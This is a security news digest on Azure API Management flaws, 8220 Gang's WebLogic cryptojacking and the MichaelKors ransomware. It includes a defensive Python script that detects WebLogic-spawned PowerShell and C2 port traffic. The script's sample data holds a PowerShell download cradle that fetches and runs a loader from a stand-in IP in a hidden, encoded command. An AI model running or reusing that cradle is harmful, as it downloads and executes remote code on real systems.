18th May, 2023
3 Vulnerabilities Found in Microsoft Azure API Management Service
Microsoft recently fixed three security flaws in the Azure API Management service that were disclosed by the Israeli cloud security firm Ermetic: two server-side request forgery (SSRF) issues and an unrestricted file upload flaw in the API Management developer portal. Exploiting these flaws could have allowed attackers to access sensitive information, bypass security controls and execute unauthorized code. Microsoft patched the vulnerabilities after responsible disclosure. Securing cloud-based services remains an ongoing challenge, and prompt remediation is vital to maintaining the integrity of such platforms.
Advanced Phishing-as-a-Service Platform Targeting Microsoft 365 Users
8220 Gang Exploiting Oracle WebLogic Flaw for Crypto-Mining
The cryptojacking group known as 8220 Gang has been exploiting a six-year-old vulnerability in Oracle WebLogic Server, CVE-2017-3506, which allows a remote attacker to execute arbitrary commands. By exploiting it, the group can gain unauthorized access to sensitive data or take over entire systems. 8220 Gang, previously documented by Cisco Talos, targets vulnerable Oracle WebLogic and Apache web servers to deploy cryptocurrency-mining malware, relying on off-the-shelf malware downloaders and crypters to conceal its activity and evade detection. In the latest attack chain, the group exploits the WebLogic flaw to deliver a PowerShell payload, which in turn creates a second, obfuscated PowerShell script in memory. Once a few further requirements have been met, the malware communicates with a command-and-control (C2) server over TCP port 9090, 9091 or 9092.
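The attack chain above gives a defender two observable links: a WebLogic JVM spawning PowerShell (typically with an encoded, in-memory stage) and a follow-on connection to TCP 9090-9092. The script below is an added example, not code from the article or from any of the vendors it cites, that correlates the two over constructed Sysmon-style process-creation and network events; the hostnames, paths, IPs and stage URL are made up, and the event record layout is a simplification of real telemetry. The C2 ports are deliberately used only to raise severity after the process chain has matched, because 9090-9092 are also common for legitimate management consoles.

```python
import base64
import re
from dataclasses import dataclass

# Ports the article reports for 8220 Gang C2 traffic. On their own they are a
# weak indicator (9090-9092 host plenty of benign admin consoles), so they are
# used only to escalate severity once the process chain has already matched.
C2_PORTS = {9090, 9091, 9092}

# PowerShell's encoded-command switch (long and short forms) plus its base64 argument.
ENCODED_FLAG = re.compile(r"(?i)\s-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]{16,})")


@dataclass
class ProcessEvent:
    """Process-creation record (Sysmon event ID 1 style). Constructed format."""
    host: str
    parent_image: str
    image: str
    command_line: str


@dataclass
class NetEvent:
    """Outbound connection record (Sysmon event ID 3 style). Constructed format."""
    host: str
    image: str
    dst_ip: str
    dst_port: int


def decode_encoded_command(command_line: str):
    """Return the decoded -EncodedCommand payload, or None if there is none.
    PowerShell encodes the script as UTF-16LE before base64, so decode accordingly."""
    m = ENCODED_FLAG.search(command_line)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def is_weblogic_spawning_powershell(ev: ProcessEvent) -> bool:
    """WebLogic runs inside a JVM, so its parent image is java(.exe); a Java web
    server launching PowerShell is the first link in the chain described above."""
    parent = ev.parent_image.lower().replace("\\", "/")
    child = ev.image.lower().replace("\\", "/")
    return parent.endswith(("/java.exe", "/java")) and child.endswith(("/powershell.exe", "/pwsh.exe"))


def find_attack_chain(proc_events, net_events):
    """Flag every java->powershell spawn; mark it high severity when the same host
    also connected to one of the reported C2 ports, medium otherwise."""
    findings = []
    for p in proc_events:
        if not is_weblogic_spawning_powershell(p):
            continue
        c2_hits = sorted({(n.dst_ip, n.dst_port) for n in net_events
                          if n.host == p.host and n.dst_port in C2_PORTS})
        findings.append({
            "host": p.host,
            "severity": "high" if c2_hits else "medium",
            "decoded_command": decode_encoded_command(p.command_line),
            "c2_candidates": c2_hits,
        })
    return findings


def build_sample_events():
    """Constructed telemetry for the demo; hosts, paths, IPs and the URL are invented."""
    stage1 = "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.10/loader.ps1')"
    encoded = base64.b64encode(stage1.encode("utf-16-le")).decode()
    ps = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
    procs = [
        # Full chain: WebLogic JVM -> encoded PowerShell -> C2 on 9090/9092.
        ProcessEvent("weblogic-01", r"C:\Oracle\jdk\bin\java.exe", ps,
                     f"powershell.exe -nop -w hidden -enc {encoded}"),
        # Suspicious spawn but no C2 port contact: still worth a look.
        ProcessEvent("weblogic-02", r"C:\Oracle\jdk\bin\java.exe", ps,
                     r"powershell.exe -File C:\scripts\rotate-logs.ps1"),
        # Port 9091 alone from a workstation must not fire: parent is explorer.exe.
        ProcessEvent("workstation-07", r"C:\Windows\explorer.exe", ps, "powershell.exe"),
    ]
    nets = [
        NetEvent("weblogic-01", "powershell.exe", "203.0.113.10", 9090),
        NetEvent("weblogic-01", "powershell.exe", "203.0.113.10", 9092),
        NetEvent("weblogic-02", "java.exe", "10.0.0.5", 1521),
        NetEvent("workstation-07", "powershell.exe", "198.51.100.7", 9091),
    ]
    return procs, nets


if __name__ == "__main__":
    for finding in find_attack_chain(*build_sample_events()):
        print(finding)
```

Running it prints one high-severity finding for weblogic-01 (with the decoded download cradle and both C2 candidates) and one medium-severity finding for weblogic-02; the workstation's port 9091 connection produces nothing, which is the intended behaviour for a port-only indicator.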
Targeting Linux and VMware ESXi Systems: Introducing the Latest 'MichaelKors' Ransomware-as-a-Service
A new ransomware-as-a-service (RaaS) operation named MichaelKors has emerged, specifically targeting Linux and VMware ESXi systems. According to a report by cybersecurity firm CrowdStrike, this reflects a growing focus by cybercriminals on ESXi. The widely deployed hypervisor does not support third-party agents or antivirus software, which makes it an attractive target.

The technique of hitting VMware ESXi hypervisors with ransomware, known as hypervisor jackpotting, has been used by various ransomware groups in the past. SentinelOne's analysis found that leaked Babuk source code had been reused by 10 ransomware families to build lockers for VMware ESXi. Several e-crime outfits, including ALPHV, Black Basta, Defray, ESXiArgs, LockBit, Nevada, Play, Rook and Rorschach, have updated their tactics to target ESXi. Attackers use compromised credentials and escalate privileges to reach the hypervisor, where they can run malicious ELF binaries and exploit vulnerabilities.

The appeal of ESXi lies in its direct access to the physical server, which gives attackers control over the underlying resources and every virtual machine on the host. The lack of security tooling, poor network segmentation and unpatched vulnerabilities in ESXi environments make them a prime target.

To counter hypervisor jackpotting, organizations are advised to limit direct access to ESXi hosts, enforce two-factor authentication, back up ESXi datastore volumes regularly, apply security updates promptly and conduct security posture reviews.

As more organizations adopt cloud environments and move workloads onto VMware-based virtualization infrastructure, the targeting of ESXi is a significant concern. VMware plans to update its knowledge base article with current information, acknowledging the need for revised security guidance.